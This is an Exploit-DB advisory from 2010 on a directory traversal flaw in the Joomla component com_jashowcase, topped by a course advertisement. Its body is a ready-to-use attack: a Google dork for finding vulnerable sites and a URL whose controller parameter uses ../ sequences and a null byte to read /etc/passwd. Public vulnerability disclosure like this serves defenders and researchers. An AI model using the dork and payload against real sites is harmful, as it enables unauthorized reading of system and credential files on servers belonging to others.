Joomla! Component com_jashowcase - Directory Traversal

EDB-ID:

11090


Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2010-01-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

@~~=======================================~~@
@~~=Script : Joomla Component com_jashowcase

@~~=Author : FL0RiX

@~~=Greez : Deep-Power ,Pyske,Wretch-x & All Friends

@~~=Bug Type : Directory Traversal

@~~=Dork : inurl:"com_jashowcase "

@~~=Note : Kimseye Hakettiginden Fazla Deger Vermeyecekmissin..!!

@~~=======================================~~@

@~~=Vuln.

: http://site/ [Yol] /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00